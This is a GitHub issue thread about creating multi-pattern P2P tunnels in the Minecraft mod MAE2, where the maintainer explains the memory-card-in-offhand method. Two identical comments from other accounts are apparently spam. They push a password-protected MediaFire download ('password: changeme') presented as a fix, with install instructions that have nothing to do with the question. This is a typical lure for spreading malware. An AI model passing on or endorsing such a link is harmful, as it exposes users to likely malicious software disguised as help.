### ISSUE TITLE
How to create mulit pattrtn p2p?

### ISSUE THREAD

**Issue by xinxinsuried** [Monifactory/MAE2#4]
I tried :
1. shift+rightClick to mulitPatternP2p ,then rightClick normalPatternP2p, show:unable to copy the configuration to the Incompatible

**Comment by xinxinsuried** [comment]
2.shift+rightClick to normalPatternP2p , then  then rightClick MulitPatternP2p. The MulitPatternP2p will become NormalPatternP2p and the EMI show:output rather than input
In fact, It's not display issues，After testing, this is indeed the output, not the second input I wanted

**Comment by xinxinsuried** [comment]
( use memory card )

**Comment by xinxinsuried** [comment]
in mae2 1.4.0 . ae2 15.2.13 .

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by SamStone1000** [comment]
You make multi p2ps by using a memory card in your offhand on the multi p2p to make it into an input, and the initial copy has to come from a multi p2p too. This is explained in the [wiki](https://github.com/Monifactory/MAE2/wiki/Multi-P2P-Tunnels)

Multi p2ps turning into single p2ps with memory cards is an old mechanic I need to remove at some point

**Comment by xinxinsuried** [comment]
Thanks , the mutliP2P work !

**Comment by xinxinsuried** [comment]
Due to the translation to my language issues, the word 'offhand' was omitted, i'm got it now, thanks again!
